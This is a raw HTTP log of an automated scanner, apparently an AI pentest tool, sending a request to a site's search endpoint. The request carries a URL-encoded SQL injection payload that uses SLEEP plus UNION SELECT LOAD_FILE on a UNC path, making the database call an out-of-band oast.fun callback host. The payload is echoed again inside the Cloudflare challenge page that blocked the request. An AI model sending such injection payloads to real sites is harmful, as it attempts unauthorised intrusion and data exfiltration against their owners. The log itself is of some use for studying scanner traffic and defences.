REQUEST:
GET https://my.myfirst.tech/search?q=%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%280%29%29%29a%20UNION%20SELECT%20LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zronkz8r3720l5.oast.fun%27%2C%27%5C%5Cb%27%29%29%29--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:38:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9974
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c846266ddfa110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=b2uX9VyXgS9P1W663pd1uWzohsCLbNhTDjwijKtk5Xuw%2BmILOq1Ovw0c6QKtlLYpTpJVEEFX7fPYvgxIDYLO4fRKGzvRpGg13GRlfYypXb9auOgf5ZYnOm5IWEstD%2BkrZg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c846266ddfa110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'ocBf8zqwBsshMONgD3w_q3_ggwFgFBQOFtAiDltsKwk-1784281109-1.2.1.1-rZJOqL16uM2WcCKBPsjBsQ67lbl9l88OQII..PZd92BoFY4gSKt.LYWkyO0H8jsh',cITimeS: '1784281109',cRay: 'a1c846266ddfa110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?q=%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%280%29%29%29a+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zronkz8r3720l5.oast.fun%27%2C%27%5C%5Cb%27%29%29%29--+-\u0026__cf_chl_tk=jWrGSdb.AbnjveWVFWMQytLvDh8jG15M6EDdCaXMPug-1784281109-1.0.1.1-vYuE4VzhBoQqPLUeVTw92owdA4TamTzdAuZIXP6rvns",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?q=%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%280%29%29%29a+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zronkz8r3720l5.oast.fun%27%2C%27%5C%5Cb%27%29%29%29--+-\u0026__cf_chl_f_tk=jWrGSdb.AbnjveWVFWMQytLvDh8jG15M6EDdCaXMPug-1784281109-1.0.1.1-vYuE4VzhBoQqPLUeVTw92owdA4TamTzdAuZIXP6rvns",md: 'CFhURKzve6BNI.WmdKUPUvYg.0sghLN_RV.zymjZajc-1784281109-1.2.1.1-Q2sMVwWt8czwy5pvRWtsxnqUUTsVIRNtF4VAlLzzCmAUIqNHSDhfHioAvBbkP3yGGlV6nggsAS5nHyRZH4_rujv7TDlEPtie3IjO.eGnKMxh9zHnwUGmE4a3zvSc5E.72pyCRTjhFzSE0n__T.uki2Jofe6hqgQbZy5sqa5PzbZZGMJf61MPUIZZnktjr1u2itQc11xSzqdM.nePjbH_Mc3Uy.cEZzSc8C947sq0.ZAPEfYyST0zmALE0cnh4XGdAyUD.7lQPVLNpo7rNzO6edRWeQFUvx5boDXBjNGSeRIj6YkhkWoyHMEMHzs6cIIc6zgMOPb7e0r2o5Q17T1HAfq4dZTwSx.ChdQDPfQZ9RMYN5xk8xnD49VqjtWim.wziLPpY7V0fRgKGb1YIbA5E8jQppl281f4dzegME0VxN7xnOf4_3sdoGJbjh7FpcNCtOJR8AaQm1.E89exKbZePVrnc78ZmGn9scQHGg20JEeYoWXGiRIIHKEXIrvenMapSEbcAmPzKhCUJ72iyTgv5S0Jvm9dVzQAA4Drz.t2DClsb6gTICAl0yIJSiwW4U8_2p1IZ.9Fy1nuaY8gdH5oZNM.ulHqxBauLHuCqdosWUQQxJ3znF2F1WT._YQsd.S6sxelQtX4_ygr7282mk2wZa3wKFV5yDMT78dYjf_vQoUsGZow3wgtTYE9QJp2HRxbQbrntjs6rEiHaDCdy._Aitq56RbZFYdhAGd0o6akTuZ3_YZvaT.Lh6P8aH7bIcE2qN4xOD3_EUduksBYdf5hYvVk6QaeFi1BabxJAk7OE671zr0aDsH8bG8xleQcF_GuTFb7yX7Kj6uIf8Ur.v4kP7pffJtOvSX9KCeUw6ypC3mgrj_QT2mVoHLArdTjtKlb8YQ7rTSre6RBl1lqqYVZY_jCCbYtdmp9HX5ab9F7bqsklvBichAua3nYAggUUC9jBSYv9fJZNuX2cQKggkrUOiYAU0KgJ3vALcDanLQEhjuplLxWD4Uvv2O.p9gUJxkYwJLto68uAVJi9OIxJLVSXaiQVH1Xd6MTNBgAajJLa3nz44mNi6Q3UKFF0xr4Mat_821WQi4GTAPE4zOAkdSpJBvGHp7G83Rpxj_jHnajqmEmZ8znIrELhM9odq1whuL9dtzYIcdqIIVIvSZ0KTb7cGj.01mLl8NKfoWHbD9JUDzNtWZfeX4JlMrwlDR.F_OubHPcuHobONh2PJGeGhkDBERHuKJubWyLfkmqr0q_zA2r3wilpefCb6tWASZyLm9k.wJICiLvb0WdA1X3M9nxQc7epEwtLRpxDxGBrFuFmRj49f2nR1TGO8Pyl.EbNF1PBo9moqEVDJMCdv4BgZ5x6Q',mdrd: 'GD6oK7ydO6RghLoxkcLFNfakyqMlHjxCbCmey6phg3o-1784281109-1.2.1.1-fUldrYnqn_F7Q3_guzBkz2qSeKXP6N_8d_e6rGJso4oWkHgdNoqXGp9h3X_rk4CLNGzzYNKRr7qoA.uPk4_QB.EK3jqwMf4FKIjMQH3ZmF1sJokw0Vtg3kQ5DV1bW7MYEk4.gsqMp4aGXIRtXceh65hKh42Ot0K9w9y6s30FcoCviCH_fKC2.giOpopqnXLUPp_Ra5kcY4LXhwRSzUjGFXS2g7EljzgNwq7mLebbeKV1pFP9D4XC3Yd5lYEYKXO0',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c846266ddfa110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?q=%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%280%29%29%29a+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zronkz8r3720l5.oast.fun%27%2C%27%5C%5Cb%27%29%29%29--+-\u0026__cf_chl_rt_tk=jWrGSdb.AbnjveWVFWMQytLvDh8jG15M6EDdCaXMPug-1784281109-1.0.1.1-vYuE4VzhBoQqPLUeVTw92owdA4TamTzdAuZIXP6rvns"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
